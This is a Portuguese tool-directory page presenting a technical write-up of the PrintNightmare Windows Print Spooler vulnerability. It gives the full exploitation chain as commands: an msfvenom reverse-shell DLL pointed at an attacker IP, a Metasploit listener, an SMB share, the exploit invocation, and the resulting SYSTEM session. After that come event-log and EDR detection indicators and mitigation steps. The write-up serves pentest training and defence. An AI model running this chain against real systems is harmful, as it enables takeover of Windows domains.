Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-1675-PrintNightmare-Analysis — Artigo técnico e análise do PrintNightmare (CVE-2021-1675 / CVE-2021-34527), abordando exploração RCE/LPE, detecção por meio de logs de eventos do Windows e mitigação para o Print Spooler. | Kitploit
Ferramentas/GitHubGitHub/velessecurity/cve-2021-1675-printnightmare-analysis
Escalada de PrivilégiosReconhecimentoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoPapers e PesquisaAprendizado e EducaçãoResposta a IncidentesAnálise de Logs

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubvelessecurity/cve-2021-1675-printnightmare-analysis

CVE-2021-1675-PrintNightmare-Analysis

Artigo técnico e análise do PrintNightmare (CVE-2021-1675 / CVE-2021-34527), abordando exploração RCE/LPE, detecção por meio de logs de eventos do Windows e mitigação para o Print Spooler.

Ver Repositório
há 1 diaAinda não revisado

Pesquisa de vulnerabilidades: escalada local de privilégios e RCE via Windows Print Spooler (PrintNightmare / CVE-2021-1675)

O repositório contém um relatório técnico detalhado (write-up) e uma análise do conceito de exploração de uma vulnerabilidade crítica no serviço de gerenciamento de impressão do Windows (Print Spooler), que permite a um usuário de domínio com privilégios baixos executar remotamente código arbitrário com os mais altos privilégios do sistema.

🛑 AVISO E ISENÇÃO DE RESPONSABILIDADE: Este material foi preparado exclusivamente para fins educacionais e para a realização de auditorias de segurança legítimas (Pentest). O uso das técnicas descritas contra sistemas sem o consentimento prévio por escrito dos proprietários é passível de punição por lei.


📌 Relevância e contexto da pesquisa

As vulnerabilidades da família PrintNightmare representam uma ameaça crítica para ambientes corporativos baseados em Windows Server e Active Directory. A falha arquitetural na verificação de permissões nas interfaces RPC MS-RPRN (Print System Remote Protocol) e MS-PAR (Print System Asynchronous Remote Protocol) permite solicitar legitimamente a instalação de drivers de impressora em um servidor remoto.

O principal perigo é que, por padrão, o serviço de gerenciamento de impressão (spoolsv.exe) está ativo na maioria dos servidores, incluindo controladores de domínio (Domain Controllers), e opera no contexto de privilégios máximos, NT AUTHORITY\SYSTEM. O comprometimento de uma única conta de baixos privilégios (por exemplo, via phishing) permite que o atacante assuma instantaneamente o controle total de toda a infraestrutura do Active Directory.


🏗 Arquitetura da pesquisa e stack

  • Objetivo: Obter controle sobre um host Windows remoto por meio das interfaces RPC de impressão.
  • Vetor de ataque: RPC Remote Driver Load → DLL Injection → SYSTEM Privileges.
  • Ferramentas: impacket (rpcdump, smbserver), msfvenom, Metasploit Framework, exploit em Python.

📈 Execução prática da exploração

Passo 1. Reconhecimento e coleta de credenciais (Reconnaissance)

Para implementar o vetor de execução remota de código (RCE), são necessárias credenciais de domínio válidas de um usuário com privilégios mínimos (fornecidas nas condições da pesquisa).

  • Auditoria básica do serviço: O serviço Print Spooler (spoolsv.exe) na máquina Windows alvo está ativo e opera com privilégios máximos de SYSTEM, o que abre uma oportunidade direta para escalada local de privilégios (LPE) no host por meio do carregamento de uma biblioteca não confiável.

Passo 2. Varredura das interfaces RPC (Scanning)

Antes de executar o exploit principal, é necessário confirmar que a máquina remota oferece os protocolos de impressão vulneráveis e está aberta para interação pela rede. Realizamos o levantamento das interfaces RPC do sistema alvo:

root@kitploit:~
impacket-rpcdump @<TARGET_IP> | egrep 'MS-RPRN|MS-PAR'

Saída controlada do terminal:

root@kitploit:~
Protocol: [MS-RPRN], Endpoint: [\pipe\spoolss]
Protocol: [MS-PAR], Endpoint: [\pipe\spoolss]
  • Insight da etapa: O host alvo retornou com sucesso as linhas dos protocolos [MS-RPRN] e [MS-PAR]. Isso confirma 100% que o sistema suporta as interfaces de impressão remota necessárias e é vulnerável ao vetor PrintNightmare.

Passo 3. Preparação do payload e da infraestrutura (Weaponization)

1. Geração de uma DLL maliciosa com reverse shell:

Criamos um payload para arquitetura x64, especificando o endereço IP da nossa máquina atacante para a conexão reversa:

root@kitploit:~
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -f dll -o /tmp/malicious.dll

2. Iniciar o listener em segundo plano no Metasploit:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ATTACKER_IP>; set LPORT 4444; run -j"

3. Implantação de um compartilhamento SMB local:

O servidor Windows alvo deve ter a possibilidade legítima de baixar nossa DLL pela rede sem utilizar utilitários de terceiros. Subimos um servidor SMB com suporte a SMBv2 a partir da pasta /tmp:

root@kitploit:~
sudo impacket-smbserver tmp /tmp -smb2support

Passo 4. Exploração e tomada do sistema (Exploitation)

Executamos o script Python do exploit, fornecendo a ele as credenciais de domínio do usuário de baixos privilégios e o caminho UNC para a biblioteca maliciosa em nosso compartilhamento SMB local:

root@kitploit:~
python3 CVE-2021-1675.py <LOW_PRIV_USER>:<PASSWORD>@<TARGET_IP> '\\<ATTACKER_IP>\tmp\malicious.dll'

Log da sessão capturada com sucesso (Metasploit):

root@kitploit:~
[*] Started reverse TCP handler on <ATTACKER_IP>:4444 
[*] Sending stage (200574 bytes) to <TARGET_IP>
[*] Meterpreter session 1 opened (<ATTACKER_IP>:4444 -> <TARGET_IP>:49321)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 3412 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1935]
(c) Корпорация Майкрософт (Microsoft Corporation). Все права защищены.

C:\Windows\system32> whoami
nt authority\system
  • Resultado: Após a execução do exploit, o serviço de impressão remoto carregou com sucesso o driver malicioso da pasta de rede. No Metasploit, uma sessão Meterpreter foi aberta com status de privilégios máximos de NT AUTHORITY\SYSTEM. O alvo foi totalmente comprometido.

🔍 Indicadores de comprometimento e detecção (Detection)

Para os profissionais de Blue Team, a detecção da exploração do PrintNightmare é baseada na auditoria dos logs do Windows e no monitoramento de atividades anômalas de processos.

1. Monitoramento de eventos do Windows (Event Logs)

A execução bem-sucedida do exploit deixa registros característicos nos logs de impressão e nos logs do sistema:

  • Event ID 808 (PrintService): Registro de falha ou carregamento atípico de um módulo de impressora. Permite visualizar o nome da DLL de terceiros carregada (por exemplo, a partir de caminhos C:\Windows\System32\spool\drivers\x64\3\).
  • Event ID 7031 (System): Reinicialização forçada e repentina do serviço de Gerenciamento de Impressão (Print Spooler), causada pelo funcionamento instável do exploit.

2. Comportamento dos processos (EDR / Sysmon)

  • Atividade filha anômala: Aparecimento de processos de linha de comando (cmd.exe, powershell.exe) ou utilitários de coleta de dados cujo pai é o processo do sistema de gerenciamento de impressão spoolsv.exe. Em condições legítimas, spoolsv.exe nunca gera shells de comando.
  • Atividade de rede: Estabelecimento de conexões de saída pelo processo spoolsv.exe para recursos SMB externos (porta 445) para baixar arquivos de driver.

🛡 Recomendações para correção da vulnerabilidade (Mitigation)

  1. Desativação completa do serviço (Recomendado): Se o servidor não desempenha funções de impressão (especialmente em Controladores de Domínio), o serviço Print Spooler deve ser completamente desativado e colocado no modo Disabled.
  2. Restrição da impressão remota: Desativar a capacidade de impressão remota por meio de políticas de grupo (GPO):
    • Computer Configuration -> Administrative Templates -> Printers -> Allow Print Spooler to accept client connections (Disabled).
  3. Instalação de atualizações: Aplicar prontamente as atualizações oficiais de segurança da Microsoft (KB) para corrigir as vulnerabilidades de execução remota de código no subsistema de impressão.

🔗 Links e materiais úteis

  • Banco de dados CVE: NIST NVD - CVE-2021-1675 | NIST NVD - CVE-2021-34527
  • Artigos analíticos: Comunicado de Atualização de Segurança da Microsoft
Baixar ferramenta